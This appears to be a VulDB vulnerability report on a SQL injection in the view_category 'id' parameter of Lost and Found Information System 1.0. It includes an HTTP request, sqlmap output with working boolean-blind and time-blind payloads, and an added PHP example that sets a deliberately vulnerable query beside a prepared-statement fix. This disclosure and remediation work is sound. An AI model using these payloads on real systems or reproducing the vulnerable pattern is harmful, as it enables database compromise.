Submission #155230: SQL Injection in view category function in Lost and Found Information System - information

Title: SQL Injection in view category function in Lost and Found Information System

Description:
SQL Injection in view category function in Lost and Found Information System 1.0
Parameter: id
Product: Lost and Found Information System
Version: 1.0

PoC:

Request:
GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/php-lfis/admin/?page=categories
Connection: close
Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Run request with sqlmap and output:
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb
---

Source: https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
User: huutuanbg97 (UID 45015)
Submission: 2023-05-11 17:32 (3 years ago)
Moderation: 2023-05-12 08:01 (14 hours later)
Status: Accepted
VulDB Entry: 228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category ID SQL injection]
Points: 20
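Added illustrative example, not code from the Lost and Found Information System itself: a category-view handler in the vulnerable shape the sqlmap findings above imply (the GET id value interpolated into the SQL text, which is why a closing quote followed by AND and a tautology alters the query) beside a hardened version that validates the value as an integer and binds it through a mysqli prepared statement. The function names, the category_list table and its columns are assumptions.

```php
<?php
// Assumed handler for ?page=categories/view_category&id=<n> (not the project's code).

// Vulnerable pattern: the raw GET value becomes part of the SQL string, so input
// such as  2' AND 9766=9766 AND 'VGnK'='VGnK  is parsed as SQL, not as data.
function view_category_vulnerable(mysqli $db, array $get): ?array
{
    $id  = $get['id'] ?? '';
    $sql = "SELECT id, name FROM category_list WHERE id = '{$id}'"; // table name assumed
    $res = $db->query($sql);
    return $res ? $res->fetch_assoc() : null;
}

// Hardened form: reject anything that is not a positive integer, then bind the
// value as a parameter. The SQL text is fixed, so the input can only be data.
function view_category_safe(mysqli $db, array $get): ?array
{
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare("SELECT id, name FROM category_list WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}
```

With the hardened handler, both sqlmap payloads above fail the integer check and are answered with HTTP 400 before any query runs.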
